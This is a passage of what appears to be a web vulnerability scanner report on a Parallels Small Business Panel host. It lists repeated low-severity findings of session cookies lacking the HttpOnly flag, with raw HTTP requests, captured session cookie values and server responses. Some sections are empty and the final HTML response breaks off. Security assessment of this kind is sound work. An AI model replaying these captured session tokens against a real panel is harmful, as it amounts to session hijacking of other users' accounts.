The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Design HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:37 GMT
Connection: close

3.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit?siteId=78806f0057ebcbb04597bd12795bd6a6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Edit/Html?currentPageId=q485ez4jvyq
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:05 GMT
Connection: close

3.8. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Edit/Html?currentPageId=q485ez4jvyq
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:16 GMT
Connection: close

3.9. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Html?currentPageId=q485ez4jvyq HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response

3.10. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/Image

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/Image HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

3.11. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:34 GMT
Connection: close

3.12. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:29 GMT
Connection: close

3.13. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/Category/Add

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/Category/Add HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

3.14. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/Category/Edit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/Category/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

3.15. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/Image/Edit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:43 GMT
Connection: close

3.16. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/ImageUpload previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/ImageUpload

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/ImageUpload HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:40 GMT
Connection: close

3.17. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/MultiImagesUpload HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Edit -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();


                   }

                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('HIDE-SITE-MAP', 'Hide Site Map');

               SbAppendLocaleKey('SHOW-SITE-MAP', 'Show Site Map');

               SbAppendLocaleKey('EMPTY-PAGE-TITLE', 'Please provide the page title.');

               SbAppendLocaleKey('EMPTY-PAGE-FILE-NAME', 'Please provide a page file name.');

               SbAppendLocaleKey('INVALID-PAGE-FILE-NAME', 'Page file name can contain only Latin characters, digits, dashes, and underscores.');

               SbAppendLocaleKey('DUPLICATE-PAGE-FILE-NAME', 'Page file name must be unique within each site structure. Also, you cannot name a page \'index\' because it is a reserved name.');

               SbAppendLocaleKey('SELECT-FOR-DELETE', 'Please select at least one element.');

               SbAppendLocaleKey('SURE-TO-DELETE', 'Selected items will be deleted permanently. Continue?');

               SbAppendLocaleKey('EMPTY-CATEGORY-THUMB-WIDTH', 'Please provide a value for the Category image width parameter.');

               SbAppendLocaleKey('NOT-INT-CATEGORY-THUMB-WIDTH', 'Invalid value of the Category image width parameter. Please enter an integer number.');

               SbAppendLocaleKey('CATEGORY-MAX-THUMB-WIDTH', 'The maximum allowed value for the Category image width parameter is 2048 (px).');

               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-WIDTH', 'Please provide a value for the Image thumb width parameter.');

               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-WIDTH', 'Invalid value of the Image thumb width parameter. It must be an integer number.');

               SbAppendLocaleKey('IMAGE-MAX-THUMB-WIDTH', 'The maximum allowed value for the Image thumb width parameter is 2048 (px).');

               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-HEIGHT', 'Please provide a value for the Image thumb height parameter.');

               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-HEIGHT', 'Invalid value of the Image thumb height parameter. It must be an integer number.');

               SbAppendLocaleKey('IMAGE-MAX-HEIGHT-WIDTH', 'The maximum allowed value for the Image thumb height parameter is 1536 (px).');

               SbAppendLocaleKey('EMPTY-PREVIEW-THUMB-WIDTH', 'Please provide a value for the Preview thumb width parameter.');

               SbAppendLocaleKey('NOT-INT-PREVIEW-THUMB-WIDTH', 'Invalid value of the Preview thumb width parameter. It must be an integer number.');

               SbAppendLocaleKey('PREVIEW-MAX-WIDTH-WIDTH', 'The maximum allowed value for the Preview thumb width parameter is 2048 (px).');

               SbAppendLocaleKey('EMPTY-IMAGES-PER-PAGE', 'Please provide a value for the Images per page parameter.');

               SbAppendLocaleKey('NOT-INT-IMAGES-PER-PAGE', 'Invalid value of the of the Images per page parameter. It must be an integer number.');

               SbAppendLocaleKey('PROGRESS', 'Progress');

               SbAppendLocaleKey('ALERT', 'Alert');

               SbAppendLocaleKey('FILE-NOT-FOUND', 'File not found');

               SbAppendLocaleKey('CANNOT-RESIZE-FILE', 'Cannot resize image');

               SbAppendLocaleKey('HTTP-ERROR', 'HTTP request error');

               SbAppendLocaleKey('FURIOUS-ERROR-MESSAGE', 'Cannot upload the remaining images: click \'Retry\' to repeat the operation or click \'OK\' to close the Multiple Image Upload window.');

               SbAppendLocaleKey('EMPTY-CATEGORY-MESSAGE', 'Please provide a name for the category.');

               SbAppendLocaleKey('NO-IMAGES-SELECTED', 'Please select at least one image.');

               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');

               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');

               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');

               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
